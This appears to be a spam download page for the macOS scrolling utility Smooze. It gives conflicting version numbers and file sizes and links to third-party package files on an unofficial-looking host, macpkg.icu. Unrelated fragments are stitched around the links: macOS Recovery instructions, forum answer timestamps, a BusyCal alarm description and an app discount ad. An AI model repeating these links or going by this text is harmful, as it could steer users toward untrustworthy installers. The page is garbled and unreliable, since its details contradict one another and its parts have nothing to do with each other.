Smooth scrolling and mouse enhancements. download to High Sierra

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Main category - Drivers
Sub category - Other
Developer - Segev Sherry
Filesize - 5939
Title - Smooze

Smooze vers.1.6.7

To start up from macOS Recovery, turn on your Mac and immediately press and hold one of the following combinations on your keyboard. Command-R is generally recommended, especially if you never installed macOS Sierra 10.12.4 or later.
New! version {6889 kb}
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answered Nov 25 '16 at 0:29
Open the Mac App Store application, either from your Dock or from the Applications folder.


Recomended for MacOS https://macpkg.icu/?id=58732&kw=v-1.4.3-Smooze-NmsM.tar.gz | 5820 kbytes |

Version to Mac mini https://macpkg.icu/?id=58732&kw=VERSION-1.6.4-SMOOZE-6AU1X8.PKG | 5166 kbytes |

BusyCal displays alarms in a movable, resizable floating window that offers the ability to snooze alarms for any number of minutes, hours or days. You can even snooze an alarm until a few minutes before the start of an event, and snooze multiple alarms at once. Download: Wunderlist (Free) Every app you own will have buttery smooth scrolling. answered Oct 6 '16 at 18:58 Limited Once it's downloaded, it'll launch automatically. Follow the directions to install OS X. Open it up via System Preferences -> SteerMouse. Affinity Photo for macOS is 20% off! macapps

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